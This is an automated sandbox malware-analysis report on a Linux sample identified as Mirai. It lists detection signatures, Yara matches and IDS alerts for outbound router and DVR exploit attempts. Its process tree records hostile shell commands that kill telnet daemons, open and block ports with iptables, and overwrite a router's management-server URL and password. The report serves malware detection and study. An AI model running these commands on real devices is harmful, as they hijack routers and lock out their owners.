Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Linux Analysis Report bin.sh

Overview

General Information

Sample Name:bin.sh
Analysis ID:522924
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Executes the "iptables" command to insert, remove and/or manipulate rules
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample has stripped symbol table
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:522924
Start date:16.11.2021
Start time:15:43:38
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 43s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:bin.sh
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.evad.linSH@0/221@4/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • Created / dropped Files have been reduced to 100
  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/522924/sample/bin.sh

Process Tree

  • system is lnxubuntu1
  • bin.sh (PID: 6777, Parent: 6712, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/bin.sh
    • bin.sh New Fork (PID: 6790, Parent: 6777)
      • bin.sh New Fork (PID: 6792, Parent: 6790)
        • bin.sh New Fork (PID: 6794, Parent: 6792)
        • sh (PID: 6794, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 6797, Parent: 6794)
          • killall (PID: 6797, Parent: 6794, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • bin.sh New Fork (PID: 6813, Parent: 6792)
        • bin.sh New Fork (PID: 6814, Parent: 6792)
        • bin.sh New Fork (PID: 6815, Parent: 6792)
          • bin.sh New Fork (PID: 6825, Parent: 6815)
          • sh (PID: 6825, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6827, Parent: 6825)
            • iptables (PID: 6827, Parent: 6825, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
              • iptables New Fork (PID: 6842, Parent: 6827)
              • modprobe (PID: 6842, Parent: 6827, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • bin.sh New Fork (PID: 6855, Parent: 6815)
          • sh (PID: 6855, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6857, Parent: 6855)
            • iptables (PID: 6857, Parent: 6855, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6858, Parent: 6815)
          • sh (PID: 6858, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6863, Parent: 6858)
            • iptables (PID: 6863, Parent: 6858, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6893, Parent: 6815)
          • sh (PID: 6893, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6897, Parent: 6893)
            • iptables (PID: 6897, Parent: 6893, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6904, Parent: 6815)
          • sh (PID: 6904, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"
            • sh New Fork (PID: 6913, Parent: 6904)
            • iptables (PID: 6913, Parent: 6904, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6932, Parent: 6815)
          • sh (PID: 6932, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"
            • sh New Fork (PID: 6935, Parent: 6932)
            • iptables (PID: 6935, Parent: 6932, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6940, Parent: 6815)
          • sh (PID: 6940, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"
            • sh New Fork (PID: 6948, Parent: 6940)
            • iptables (PID: 6948, Parent: 6940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6967, Parent: 6815)
          • sh (PID: 6967, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"
            • sh New Fork (PID: 6973, Parent: 6967)
            • iptables (PID: 6973, Parent: 6967, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
        • bin.sh New Fork (PID: 6819, Parent: 6792)
        • bin.sh New Fork (PID: 6821, Parent: 6792)
        • bin.sh New Fork (PID: 6823, Parent: 6792)
        • bin.sh New Fork (PID: 6990, Parent: 6792)
        • sh (PID: 6990, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 6992, Parent: 6990)
          • iptables (PID: 6992, Parent: 6990, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • bin.sh New Fork (PID: 6993, Parent: 6792)
        • sh (PID: 6993, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 6995, Parent: 6993)
          • iptables (PID: 6995, Parent: 6993, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • bin.sh New Fork (PID: 6996, Parent: 6792)
        • sh (PID: 6996, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 6998, Parent: 6996)
          • iptables (PID: 6998, Parent: 6996, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • bin.sh New Fork (PID: 7002, Parent: 6792)
        • sh (PID: 7002, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 7010, Parent: 7002)
          • iptables (PID: 7010, Parent: 7002, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • bin.sh New Fork (PID: 7031, Parent: 6792)
        • sh (PID: 7031, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • bin.sh New Fork (PID: 7047, Parent: 6792)
        • sh (PID: 7047, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • bin.sh New Fork (PID: 7060, Parent: 6792)
        • sh (PID: 7060, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 7067, Parent: 7060)
          • iptables (PID: 7067, Parent: 7060, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • bin.sh New Fork (PID: 7087, Parent: 6792)
        • sh (PID: 7087, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 7093, Parent: 7087)
          • iptables (PID: 7093, Parent: 7087, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • bin.sh New Fork (PID: 7114, Parent: 6792)
        • sh (PID: 7114, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 7122, Parent: 7114)
          • iptables (PID: 7122, Parent: 7114, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • bin.sh New Fork (PID: 7140, Parent: 6792)
        • sh (PID: 7140, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 7145, Parent: 7140)
          • iptables (PID: 7145, Parent: 7140, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • bin.sh New Fork (PID: 7158, Parent: 6792)
        • sh (PID: 7158, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 7163, Parent: 7158)
          • iptables (PID: 7163, Parent: 7158, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • bin.sh New Fork (PID: 7171, Parent: 6792)
        • sh (PID: 7171, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 7179, Parent: 7171)
          • iptables (PID: 7179, Parent: 7171, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • bin.sh New Fork (PID: 7194, Parent: 6792)
        • sh (PID: 7194, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 7200, Parent: 7194)
          • iptables (PID: 7200, Parent: 7194, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • bin.sh New Fork (PID: 7209, Parent: 6792)
        • sh (PID: 7209, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 7216, Parent: 7209)
          • iptables (PID: 7216, Parent: 7209, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • bin.sh New Fork (PID: 7224, Parent: 6792)
        • sh (PID: 7224, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 7230, Parent: 7224)
          • iptables (PID: 7230, Parent: 7224, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • bin.sh New Fork (PID: 7241, Parent: 6792)
        • sh (PID: 7241, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 7248, Parent: 7241)
          • iptables (PID: 7248, Parent: 7241, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • bin.sh New Fork (PID: 7255, Parent: 6792)
        • sh (PID: 7255, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 7261, Parent: 7255)
          • iptables (PID: 7261, Parent: 7255, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • bin.sh New Fork (PID: 7280, Parent: 6792)
        • sh (PID: 7280, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 7290, Parent: 7280)
          • iptables (PID: 7290, Parent: 7280, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • bin.sh New Fork (PID: 7314, Parent: 6792)
        • sh (PID: 7314, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7316, Parent: 7314)
          • iptables (PID: 7316, Parent: 7314, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7317, Parent: 6792)
        • sh (PID: 7317, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7319, Parent: 7317)
          • iptables (PID: 7319, Parent: 7317, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7321, Parent: 6792)
        • sh (PID: 7321, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7327, Parent: 7321)
          • iptables (PID: 7327, Parent: 7321, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7344, Parent: 6792)
        • sh (PID: 7344, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7351, Parent: 7344)
          • iptables (PID: 7351, Parent: 7344, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7369, Parent: 6792)
        • sh (PID: 7369, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 7378, Parent: 7369)
          • iptables (PID: 7378, Parent: 7369, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7395, Parent: 6792)
        • sh (PID: 7395, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 7405, Parent: 7395)
          • iptables (PID: 7405, Parent: 7395, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7420, Parent: 6792)
        • sh (PID: 7420, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 7426, Parent: 7420)
          • iptables (PID: 7426, Parent: 7420, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7432, Parent: 6792)
        • sh (PID: 7432, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 7439, Parent: 7432)
          • iptables (PID: 7439, Parent: 7432, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
  • upstart New Fork (PID: 7470, Parent: 3310)
  • sh (PID: 7470, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7471, Parent: 7470)
    • date (PID: 7471, Parent: 7470, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7472, Parent: 7470)
    • apport-checkreports (PID: 7472, Parent: 7470, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 7497, Parent: 3310)
  • sh (PID: 7497, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7498, Parent: 7497)
    • date (PID: 7498, Parent: 7497, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7504, Parent: 7497)
    • apport-gtk (PID: 7504, Parent: 7497, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 7524, Parent: 3310)
  • sh (PID: 7524, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7525, Parent: 7524)
    • date (PID: 7525, Parent: 7524, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7526, Parent: 7524)
    • apport-gtk (PID: 7526, Parent: 7524, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
bin.shSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
bin.shJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    bin.shJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      bin.shJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        bin.shJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
            • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
            /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                /usr/networksJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                  /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                    Memory Dumps

                    SourceRuleDescriptionAuthorStrings
                    6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                      6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                        6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                          6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
                          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
                            Click to see the 12 entries

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection:

                            barindex
                            Antivirus / Scanner detection for submitted sampleShow sources
                            Source: bin.shAvira: detected
                            Multi AV Scanner detection for submitted fileShow sources
                            Source: bin.shMetadefender: Detection: 54%Perma Link
                            Source: bin.shReversingLabs: Detection: 75%
                            Antivirus detection for dropped fileShow sources
                            Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau

                            Spreading:

                            barindex
                            Opens /proc/net/* files useful for finding connected devices and routersShow sources
                            Source: /tmp/bin.sh (PID: 6815)Opens: /proc/net/route
                            Source: /tmp/bin.sh (PID: 6815)Opens: /proc/net/route

                            Networking:

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                            Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57282 -> 221.128.175.114:80
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55784
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55784
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55824
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55824
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56102
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56102
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56382
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56382
                            Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45982 -> 70.38.30.153:80
                            Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45982 -> 70.38.30.153:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33058 -> 104.103.72.220:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33058 -> 104.103.72.220:80
                            Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.72.220:80 -> 192.168.2.20:33058
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60718 -> 3.113.149.148:80
                            Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:38508 -> 52.54.104.1:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60718 -> 3.113.149.148:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36526 -> 15.164.228.23:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36526 -> 15.164.228.23:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51860 -> 66.180.167.13:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51860 -> 66.180.167.13:80
                            Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:33706 -> 104.69.40.99:80
                            Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:33706 -> 104.69.40.99:80
                            Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.69.40.99:80 -> 192.168.2.20:33706
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38172 -> 122.201.116.141:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38172 -> 122.201.116.141:80
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 201.49.41.72:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 201.49.41.72:80
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36730 -> 216.180.103.7:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36730 -> 216.180.103.7:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40506 -> 139.59.180.200:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40506 -> 139.59.180.200:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45410 -> 45.204.39.235:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45410 -> 45.204.39.235:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53170 -> 154.208.92.84:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53170 -> 154.208.92.84:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47632 -> 13.112.197.38:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47632 -> 13.112.197.38:80
                            Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43200 -> 175.119.69.229:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:35942 -> 91.195.35.202:8080
